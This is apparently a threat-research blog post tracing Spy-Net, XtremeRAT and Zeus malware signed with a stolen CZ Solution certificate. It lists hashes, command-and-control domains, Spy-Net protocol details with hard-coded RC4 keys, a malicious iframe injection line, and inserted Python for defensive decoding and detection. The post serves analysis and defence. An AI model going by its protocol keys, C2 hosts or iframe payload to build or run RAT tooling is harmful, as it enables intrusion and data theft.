The Little Signature That Could: The Curious Case of CZ Solution

Malware authors are always looking for new ways to disguise their
  actions. Attackers want their malware not only to be fully
  undetectable, but also to appear legitimate on a system, so as not to
  draw attention. Digital signatures are one way malware authors stay
  under the radar: a signature is an easy, quick way for a system or a
  user to verify the authenticity of an application, and that default
  trust is exactly what a stolen certificate abuses.


Threat actors routinely steal code-signing certificates to hide in
  plain sight. There are recent reports of banking Trojans such as Zeus
  (https://blogs.comodo.com/e-commerce/comodo-av-labs-id-zeus-trojan/)
  using valid signatures to get past both automated and human defenses.
  Part of performing accurate threat intelligence is continually looking
  to the past to help better predict the future, and the samples
  discussed in this blog illustrate that. Many of them are from the
  summer of 2013. They piqued our interest because of the mass
  distribution of RATs in one particular region, which also reminded us
  of the XtremeRAT blog we published earlier in 2014
  (/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html).



  The Little Signature That Could


While investigating an uptick in Spy-Net spam campaigns, we came
  across a digitally signed malware binary that caught our interest.
  Spy-Net allows an attacker to interact with the victim via a remote
  shell, upload and download files, interact with the registry, running
  processes and services, capture images of the desktop, and record
  from the webcam and microphone. It also contains functionality to
  extract saved passwords and turn the victim into a proxy server.
  During the build process, an attacker can choose to enable a keylogger
  and evasion functionality designed to stop the infection process if a
  debugger or virtual machine is found.


We noticed that one of the Spy-Net binary files, sc2.exe (MD5:
  6a56f6735f4b16a60f39b18842fd97d0), carried a valid digital signature
  from a company called CZ Solution Co. Ltd.





Figure 1: Signature Details of sc2.exe


Looking closer at the signature, all of the details were intact and
  the signature appeared to be valid. Two additional code-signing
  certificates had also been issued to CZ Solution Co. Ltd.





Figure 2: Additional Signature Details


Investigation of sc2.exe showed typical Spy-Net behaviors. The sample
  beaconed out to ekinox.no-ip.info. From here, we decided to
  pivot off the CZ Solution signature and see what we could find.



  Connections Emerge


As we pivoted off the CZ Solution signature, interesting commonalities
  emerged. The signature was not used only on Spy-Net binaries: we
  quickly found it on XtremeRAT, a popular RAT that both cybercriminals
  and targeted attackers use regularly. XtremeRAT's code is shared
  amongst several other Delphi RAT projects, including Spy-Net,
  CyberGate, and Cerberus.


XtremeRAT allows an attacker to:

  • Interact with the victim via a remote shell
  • Upload/download files
  • Interact with the registry
  • Manipulate running processes and services
  • Capture images of the desktop
  • Record from connected devices, such as a webcam or microphone

One XtremeRAT binary, for instance, m.exe (MD5:
  c27232691dacf4cff24a4d04b3b2896b), was seen beaconing out to
  http://omegaphotography.[co].uk,
  batardchris.servehttp.com/1234567890.functions, and
  www.batteurmag.com/[plugin].xtr.


Likewise, we saw multiple samples of the Zeus Trojan using the CZ
  Solution signature. Zeus operators can tune the Trojan to steal the
  information they are interested in, typically login credentials for
  online social networks, e-mail accounts, online banking, or other
  online financial services. Zeus is commonly seen targeting customers
  of financial institutions.


One of the Zeus samples, uk.exe (MD5:
  dcd3e45d40c8817061f716557e7a05b6) that was utilizing the CZ Solution
  signature, was beaconing out to claire-morin.com/file.php.


Looking at these three samples shows that the CZ Solution certificate
  was used to sign Spy-Net, XtremeRAT, and Zeus samples. Graphing the
  connections between the samples we profiled, you can quickly see how
  fast this web of similarities grows.



Figure 3: Connection Profile of
  Binaries Using CZ Solution



  The French Connection and C2 overlap


Attribution of actors and/or campaigns can often be a difficult and
  tedious task. However, since we were dealing with so many intertwined
  binaries, we could start to draw some parallels between samples.


When looking at the overall connections between binaries carrying the
  CZ Solution signature, a trend starts to emerge. First, there is some
  C2 overlap. For instance, Dllsv.exe (MD5:
  3f042fd6b9ce7e23b3c84c6f7323dd75), signed with the same CZ Solution
  certificate, communicates out to ekinox.no-ip.info. This malware is
  flagged as BozokRAT, a user-friendly RAT that can upload and download
  files to and from a computer, modify registry entries, and perform
  other typical RAT functions. That same C2, ekinox.no-ip.info, is also
  used by the aforementioned Spy-Net binary, sc2.exe (MD5:
  6a56f6735f4b16a60f39b18842fd97d0).


In another example of C2 overlap, a file named uk.exe (MD5:
  9c11ef09131a3373eef5c9d83802d56b), an active Zeus binary, uses
  omega-photography.co.uk as its C2. That same C2 is used by a file
  named x.exe (MD5: c27232691dacf4cff24a4d04b3b2896b), an active
  XtremeRAT binary.


Next, we needed to identify at least one infection vector, so that we
  could track how a binary signed with the CZ Solution certificate was
  getting into environments.


In one case, we found the infection vector for an XtremeRAT binary
  that was using the CZ Solution certificate: a phishing email (MD5:
  7c00ba0fcbfee6186994a8988a864385) purportedly from Armani regarding
  an order.





The email was in French, and its headers were interesting: the same
  sender has been seen in multiple French spam runs
  (http://www.projecthoneypot.org/ip_212.227.126.130).





The attachment in the email uses the RTLO (right-to-left override)
  trick (http://blog.malwarebytes.org/online-security/2014/01/the-rtlo-method/)
  to disguise a 7zip archive as a PDF.
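As an added example (not from the original post and not FireEye tooling), the Python below shows how the RTLO trick works and how a mail gateway or triage script can catch it: it models how a bidi-aware UI renders a name containing U+202E, recovers the extension the operating system will actually dispatch on, and flags the mismatch. The attachment names are constructed for the example; the post does not give the real attachment name from the Armani email.

```python
# Unicode bidirectional control characters. They change how a name is
# displayed without changing the bytes the operating system opens.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO",
    "\u202e": "RLO", "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI",
    "\u2069": "PDI", "\u200e": "LRM", "\u200f": "RLM",
}

# Constructed sample attachment names (not taken from the post's email).
SAMPLES = [
    "Commande_Armani.pdf",            # benign: no controls, extension is what it shows
    "Commande_Armani\u202efdp.7z",    # displays as "...z7.pdf", is really a .7z archive
    "Facture_\u202efdp.exe",          # displays as "Facture_exe.pdf", is really an .exe
]


def strip_bidi(name: str) -> str:
    """Remove bidi controls so the name is safe to echo into logs and alerts."""
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def displayed_name(name: str) -> str:
    """Approximate what a bidi-aware UI shows: text after an RLO (U+202E) runs
    right-to-left until a PDF (U+202C) or the end of the string; other controls
    are invisible. This is not the full Unicode Bidi Algorithm, only the part
    the filename trick relies on."""
    shown, i = "", 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            end = name.find("\u202c", i + 1)
            segment = name[i + 1:] if end == -1 else name[i + 1:end]
            shown += segment[::-1]
            i = len(name) if end == -1 else end + 1
        elif ch in BIDI_CONTROLS:
            i += 1
        else:
            shown += ch
            i += 1
    return shown


def true_extension(name: str) -> str:
    """Extension the OS dispatches on: text after the last '.' in the raw bytes."""
    cleaned = strip_bidi(name)
    return cleaned.rsplit(".", 1)[-1].lower() if "." in cleaned else ""


def analyze_filename(name: str) -> dict:
    """Report what the user sees versus what will actually run."""
    controls = [(i, BIDI_CONTROLS[ch]) for i, ch in enumerate(name) if ch in BIDI_CONTROLS]
    shown = displayed_name(name)
    shown_ext = shown.rsplit(".", 1)[-1].lower() if "." in shown else ""
    real_ext = true_extension(name)
    return {
        "raw": strip_bidi(name),
        "displayed": shown,
        "displayed_extension": shown_ext,
        "true_extension": real_ext,
        "controls": controls,
        # Any bidi control in an attachment name is worth a look; a visible
        # extension that differs from the real one is the RTLO trick itself.
        "suspicious": bool(controls),
        "extension_mismatch": bool(controls) and shown_ext != real_ext,
    }


if __name__ == "__main__":
    for sample in SAMPLES:
        r = analyze_filename(sample)
        print(f"{r['displayed']!r:32} real={r['true_extension']:4} "
              f"mismatch={r['extension_mismatch']}")
```

Blocking every filename that contains a bidi control is too blunt for environments with right-to-left languages, so the example separates "has controls" from "the visible extension lies"; alert on the second, and log the stripped name so the control characters cannot also scramble the alert text.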


Looking at all the samples we correlated and pivoted off of, we found
  that the majority of both the language and the C2s in use revolved
  around French: the domains in the C2 infrastructure were almost
  exclusively French, as was the registrant information for those
  domains.



  Spy-Net C2 Protocol Analysis



As we have already shared some analysis details of XtremeRAT in a
  previous blog
  (/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html),
  we decided to share some information and tools we built regarding
  Spy-Net this time. This information is based on our analysis of
  Spy-Net version 2.6 specifically; other versions of Spy-Net may have
  significant changes to the protocol. Spy-Net 2.6 uses a homegrown
  protocol, like many other publicly available RATs. It is an
  ASCII-based, pipe-delimited protocol using Portuguese keywords that
  employs two totally different forms of obfuscation: one for outbound
  communication to the attacker and another for inbound communication
  to the implant. The outbound communications are compressed with zlib
  and encrypted with RC4. The RC4 key is hard-coded and changes with
  the version. For example, the RC4 key for Spy-Net 2.6 is
  njkvenknvjebcddlaknvfdvjkfdskv, while for CyberGate 1.07, which has a
  similar (if not the same) protocol, the key is
  njgnjvejvorenwtrnionrionvironvrnvcg107, and CyberGate 1.18's key is
  njgnjvejvorenwtrnionrionvironvrnvcg117.


The astute reader may have noticed that the last three digits of the
  CyberGate keys (roughly) represent the version number of CyberGate.
  The inbound communication to the implant employs an ASCII encoding
  scheme similar to Base64. The protocol begins with a simple
  authentication scheme in which the implant sends an authentication
  password that is validated by the client. This password is
  configurable by the attacker and defaults to abcd1234. The implant
  then sends the entirety of its configuration, as set by the attacker,
  to the client so it can be displayed on the client's "Configuration"
  tab.



  Authentication



  Implant->Client: mypassword|Y|



  Configuration Request and Response



  Client->Implant: configuracoesdoserver|



  Implant->Client:
 
configuracoesdoserver|configuracoesdoserver|192.168.1.2:81|#myID|mypassword|C:\WINDOWS\install\server.exe|C:\Program
  Files\Internet Explorer\iexplore.exe| |
  |{0OP8GNN1-GIWW-CC7M-AJ0I-6Y554UOJJ241}|Policies|FALSE|TRUE|TRUE|TRUE|***MUTEX***|
  | |TRUE|FALSE| | | | | | |FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|server.exe#crack.exe#|FALSE|


The outbound communications from the implant to the client are
  prepended with an ASCII representation of the length of the payload
  followed by a pipe character and a new line character.





There is a noticeable lack of sophistication in Spy-Net's code. For
  example, in some cases the length indicator is followed by a pipe and
  a single newline (\n) character, as used on *nix operating systems;
  in other cases it is followed by carriage return and newline (\r\n),
  as used on Windows. The same lack of consistency shows in the two
  totally different obfuscation schemes, and in the fact that file
  transfers are not obfuscated at all while the rest of the protocol
  is.
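The following Python encoder/decoder for the implant-to-client direction is an added example, not the ChopShop module or any other FireEye code. It is built only from what the post states: pipe-delimited ASCII, zlib plus RC4 with the version-specific hard-coded key, and a "length|" prefix terminated by either \n or \r\n. Two assumptions are labelled in the code: that the implant compresses before it encrypts (the post lists zlib first), and that the configuration field positions are read off the single sample reproduced above rather than from Spy-Net's source. The inbound client-to-implant encoding is not implemented, because the post only describes it as "similar to Base64".

```python
import zlib

# RC4 keys quoted in the post; each RAT build hard-codes its own.
RC4_KEYS = {
    "spynet-2.6": b"njkvenknvjebcddlaknvfdvjkfdskv",
    "cybergate-1.07": b"njgnjvejvorenwtrnionrionvironvrnvcg107",
    "cybergate-1.18": b"njgnjvejvorenwtrnionrionvironvrnvcg117",
}

# The configuration response quoted in the post (implant -> client), used here
# as sample input for the round trip.
CONFIG_SAMPLE = (
    "configuracoesdoserver|configuracoesdoserver|192.168.1.2:81|#myID|mypassword|"
    "C:\\WINDOWS\\install\\server.exe|C:\\Program Files\\Internet Explorer\\iexplore.exe| |"
    " |{0OP8GNN1-GIWW-CC7M-AJ0I-6Y554UOJJ241}|Policies|FALSE|TRUE|TRUE|TRUE|***MUTEX***|"
    " | |TRUE|FALSE| | | | | | |FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|"
    "FALSE|FALSE|FALSE|FALSE|server.exe#crack.exe#|FALSE|"
)


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def split_fields(message: str) -> list:
    """Split a pipe-delimited message; a trailing '|' terminates the last field."""
    parts = message.split("|")
    if parts and parts[-1] == "":
        parts.pop()
    return parts


def encode_outbound(fields, key=RC4_KEYS["spynet-2.6"], newline=b"\n") -> bytes:
    """Build one implant->client frame: b'<len>|' + newline + RC4(zlib(message)).
    Assumption: compress first, then encrypt, as the post's wording implies."""
    message = ("|".join(fields) + "|").encode("latin-1")
    body = rc4(key, zlib.compress(message))
    return str(len(body)).encode("ascii") + b"|" + newline + body


def decode_outbound(stream: bytes, key=RC4_KEYS["spynet-2.6"]) -> list:
    """Parse every frame in a captured implant->client byte stream, accepting
    both '\\n' and '\\r\\n' after the length indicator (the post notes both)."""
    messages, pos = [], 0
    while pos < len(stream):
        bar = stream.index(b"|", pos)
        length = int(stream[pos:bar].decode("ascii"))
        pos = bar + 1
        if stream[pos:pos + 2] == b"\r\n":
            pos += 2
        elif stream[pos:pos + 1] == b"\n":
            pos += 1
        else:
            raise ValueError("no newline after length indicator at offset %d" % pos)
        body = stream[pos:pos + length]
        if len(body) != length:
            raise ValueError("truncated frame at offset %d" % pos)
        pos += length
        plain = zlib.decompress(rc4(key, body)).decode("latin-1")
        messages.append(split_fields(plain))
    return messages


def summarize_config(fields) -> dict:
    """Pull out the fields whose meaning is evident from the post's sample.
    Assumption: positions are inferred from that one sample, not from source."""
    if len(fields) < 7 or fields[0] != "configuracoesdoserver":
        raise ValueError("not a configuracoesdoserver response")
    return {"c2": fields[2], "id": fields[3], "password": fields[4],
            "install_path": fields[5], "inject_target": fields[6]}


if __name__ == "__main__":
    # Replay the authentication and configuration exchange with mixed newlines.
    capture = encode_outbound(["mypassword", "Y"]) + \
        encode_outbound(split_fields(CONFIG_SAMPLE), newline=b"\r\n")
    for msg in decode_outbound(capture):
        print(msg[0], "...", len(msg), "fields")
    print(summarize_config(decode_outbound(capture)[1]))
```

A wrong key produces garbage that zlib rejects with zlib.error, so trying each key in RC4_KEYS until decompression succeeds is a cheap way to tell a Spy-Net 2.6 capture from a CyberGate one.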



  Spy-Net Protocol Decoder


Since Spy-Net is a publicly available RAT that we see in use quite
  often, we built a ChopShop module for it and are sharing it in
  cooperation with our friends at MITRE. The module is now available as
  a standard part of the framework on GitHub
  (https://github.com/MITRECND/chopshop). We are also sharing a Spy-Net
  configuration dumping pycommand for Immunity Debugger
  (https://github.com/fireeye/pycommands). While hunting for related
  samples in VirusTotal, we came across a pcap that captured the initial
  infection and subsequent communication of the Spy-Net binary we
  initially mentioned (MD5: 6a56f6735f4b16a60f39b18842fd97d0). This gave
  us a great opportunity to test our new decoder. One thing that Spy-Net
  implants commonly send out automatically is a thumbnail image of the
  user's desktop, which is displayed on the client.





Our decoder can extract such images from the pcap, and what we found
  gave us a further hint that we may be dealing with attacks focused on
  France. Although difficult to read due to the very low resolution of
  the thumbnail, our pcap decoder was able to tell us that the title of
  the browser window open in this screenshot is "Football - MAXIFOOT
  l'actualité foot et transfert - Windows Internet Explorer."



 



  Distribution via Malicious Java Applet


According to the details of the pcap we decoded, this French football
  Web site (maxifoot.fr) was apparently compromised and had an iframe
  inserted into it that pointed to another compromised Web site, a
  Canadian addiction recovery resource: unwasted.ca.


<iframe width="1px" height="1px"
  src="hxxp://unwasted.ca/skins/index.html"
  style="display: block;" ></iframe>


The latter site hosted a malicious Java applet that downloaded the
  Pony/Fareit downloader. The downloader then installed ZeuS and
  downloaded and executed the aforementioned Spy-Net binary. All of
  these binaries were signed with the stolen digital certificate. The
  malicious Java applet used to install the Pony downloader was created
  by Foxxy Software, which ESET has previously written about
  (http://www.welivesecurity.com/2012/08/07/foxxy-software-outfoxed/).



  RAT Configuration Details


We assembled a compilation of the meaningful configuration data found
  in the XtremeRAT and Spy-Net samples we came across in our analyses.
  You can observe some similarities between the samples' configurations.


MD5                               | Version               | Dir/Path                                | ID          | Group     | Mutex    | Password
----------------------------------|-----------------------|-----------------------------------------|-------------|-----------|----------|---------
f5e6c0a2c9000311513521947a76cb4b  | Spy-Net 2.6           | C:\WINDOWS\system32\conhost\conhost.exe | Updater2014 | NA        | R5438NM5 | abcd1234
6a56f6735f4b16a60f39b18842fd97d0  | Spy-Net 2.6           | C:\WINDOWS\system32\Winini\taskhost.exe | Uframer     | NA        | A7TF5W   | abcd1234
7416ec2889227f046f48c15c45c102da  | XtremeRAT 3.5 Private | InstallDir                              | SpaM        | SPAM      | eyA8znpc | NA
2e776e18dec61cf6ccd68fbacd55fab3  | XtremeRAT 3.5 Private | svhost                                  | Diesel      | Diesel    | lNFAH0   | NA
be47ec66d861c35784da527bf0f2e03a  | XtremeRAT 3.5 Private | svhost                                  | IdSec       | USA3      | lNFAH0   | NA
c27232691dacf4cff24a4d04b3b2896b  | XtremeRAT 3.5 Private | InstallDir                              | IdSec       | idsection | eyA8znpc | NA
e79636e4c7418544d188a29481c100bb  | XtremeRAT 3.5 Private | svhost                                  | IdSec       | USA3      | lNFAH04  | NA
bd70a7cae3ebf85cf1edd9ee776d8364  | XtremeRAT 3.5 Private | svhost                                  | IdSec       | IdSec     | lNFAH0   | NA
0be3b0e296be33903bf76b8cd9cf52ca  | XtremeRAT 3.5 Private | svhost                                  | CiTa        | IdSec     | x4KybsbM | NA


  Conclusion


The use of digital signatures by threat actors is not going to
  decrease anytime soon. It gives them a quick, easy way to bypass
  traditional security controls, since certificates and signatures are
  typically trusted by default. This blog shows that the trend still
  holds. We looked to the past here to better understand motivations
  and trends going forward. Based on the information gathered, we can
  say with confidence that the CZ Solution signatures were being used
  by an individual or group of individuals operating French assets and
  infrastructure.


These particular actors did not show a significant level of expertise,
  but did show collective resources with knowledge of at least Zeus,
  Spy-Net, and XtremeRAT. It is likely that these actor(s) were using
  the same signature to send out a wide range of binaries, possibly
  even beyond the four families discussed here. As we wrote this blog,
  we could not help but be reminded of the spam run focused on Colombia
  and Central America that we wrote about back in February of this year
  (/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html):
  a spam run that was regionally focused, but with no apparent targeting
  in nature, utilizing a mix of ZeuS and off-the-shelf RATs.


Protecting your organization from threats that use valid digital
  signatures can include checking the signing certificate's serial
  number. In this case the serial number 6e 7b 63 95 ac 5b 5c 8a 2a ec
  c4 52 8d 9e 65 10 identifies the certificate issued to this
  publisher. Also, if you are running your own internal certificate
  authority, ensure you are promptly revoking certificates that may
  have been compromised, so that compromised certificates cannot be
  reused in attacks.
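As an added example (not from the post), here is a pure-Python check that walks a DER-encoded Authenticode PKCS#7 blob, pulls the serial number of every embedded v3 certificate, and matches it against a blocklist regardless of how the serial was copied (spaces, colons, openssl's "serial=" prefix, leading 00). Extracting the blob from a PE is outside the block: `osslsigncode extract-signature -in sample.exe -out sig.der`, or reading the PE security directory (IMAGE_DIRECTORY_ENTRY_SECURITY), both yield it. The `build_fake_signed_data` helper fabricates a structurally plausible but cryptographically meaningless blob carrying the CZ Solution serial from the post, purely so the walker can be exercised offline; it is not a real signature.

```python
CZ_SOLUTION_SERIAL = "6e7b6395ac5b5c8a2aecc4528d9e6510"   # serial quoted in the post


def der_children(data: bytes) -> list:
    """Parse the consecutive DER TLVs in `data` into (tag, value) pairs."""
    items, pos = [], 0
    while pos < len(data):
        tag = data[pos]
        if tag & 0x1F == 0x1F:
            raise ValueError("high tag numbers are not used in X.509/PKCS#7")
        if pos + 1 >= len(data):
            raise ValueError("truncated TLV header")
        length, hdr = data[pos + 1], pos + 2
        if length & 0x80:                            # long-form length
            n = length & 0x7F
            if n == 0 or n > 4:
                raise ValueError("indefinite or oversized length (not DER)")
            length = int.from_bytes(data[hdr:hdr + n], "big")
            hdr += n
        if hdr + length > len(data):
            raise ValueError("TLV value runs past end of data")
        items.append((tag, data[hdr:hdr + length]))
        pos = hdr + length
    return items


def _is_v3_certificate(kids: list) -> bool:
    """Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, BIT STRING },
    with tbsCertificate starting [0] EXPLICIT version, serialNumber INTEGER,
    signature SEQUENCE. v1 certificates (no version field) are deliberately
    skipped: that shape also matches a CRL and would misreport its version."""
    if len(kids) != 3 or [t for t, _ in kids] != [0x30, 0x30, 0x03]:
        return False
    try:
        tbs = der_children(kids[0][1])
    except ValueError:
        return False
    return len(tbs) >= 3 and [t for t, _ in tbs[:3]] == [0xA0, 0x02, 0x30]


def find_certificate_serials(blob: bytes) -> list:
    """Serial numbers (lowercase hex, as stored in DER) of every certificate
    embedded anywhere in a DER blob such as an Authenticode PKCS#7."""
    serials = []

    def walk(items):
        for tag, value in items:
            if not tag & 0x20:                       # primitive: nothing inside
                continue
            kids = der_children(value)
            if tag == 0x30 and _is_v3_certificate(kids):
                serials.append(der_children(kids[0][1])[1][1].hex())
            walk(kids)

    walk(der_children(blob))
    return serials


def normalize_serial(text: str) -> str:
    """Canonical form for matching: accepts '6e 7b ...', '6E:7B:...' and
    openssl's 'serial=6E7B...'; drops DER's sign-padding leading 00 byte."""
    text = text.split("=", 1)[-1]
    hexstr = "".join(c for c in text if c in "0123456789abcdefABCDEF").lower()
    while len(hexstr) > 2 and hexstr.startswith("00"):
        hexstr = hexstr[2:]
    return hexstr


def blocklisted_serials(blob: bytes, blocklist) -> list:
    wanted = {normalize_serial(s) for s in blocklist}
    return [s for s in find_certificate_serials(blob) if normalize_serial(s) in wanted]


# --- constructed fixture: PKCS#7 SignedData shape around a fake v3 certificate ---
def der_encode(tag: int, payload: bytes) -> bytes:
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def build_fake_signed_data(serial_hex: str) -> bytes:
    """Only the outer structure and the first three TBS fields are realistic,
    which is all the walker inspects; the signature bytes are junk."""
    sha256_rsa = der_encode(0x30, der_encode(0x06, bytes.fromhex("2a864886f70d01010b")))
    tbs = der_encode(0x30, der_encode(0xA0, der_encode(0x02, b"\x02"))  # version v3
                     + der_encode(0x02, bytes.fromhex(serial_hex))       # serialNumber
                     + sha256_rsa)                                       # signature alg
    cert = der_encode(0x30, tbs + sha256_rsa + der_encode(0x03, b"\x00\xde\xad"))
    signed = der_encode(0x30, der_encode(0x02, b"\x01")                  # version
                        + der_encode(0x31, b"")                           # digestAlgorithms
                        + der_encode(0x30, der_encode(0x06, bytes.fromhex("2a864886f70d010701")))
                        + der_encode(0xA0, cert))                         # certificates [0]
    return der_encode(0x30, der_encode(0x06, bytes.fromhex("2a864886f70d010702"))
                      + der_encode(0xA0, signed))


if __name__ == "__main__":
    blob = build_fake_signed_data(CZ_SOLUTION_SERIAL)
    print(blocklisted_serials(blob, ["6e 7b 63 95 ac 5b 5c 8a 2a ec c4 52 8d 9e 65 10"]))
```

Serial numbers are only unique per issuing CA, so in production key the blocklist on (issuer, serial) or on the certificate thumbprint rather than the serial alone. Revocation by the CA is also not a complete answer for already-signed files: an Authenticode signature with a trusted timestamp countersignature from before the revocation date keeps validating unless the CA backdates the revocation, which is one more reason to keep a local blocklist of known-abused signing certificates.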


 


Source: The Little Signature That Could: The Curious Case of CZ Solution

Security-X


Tags: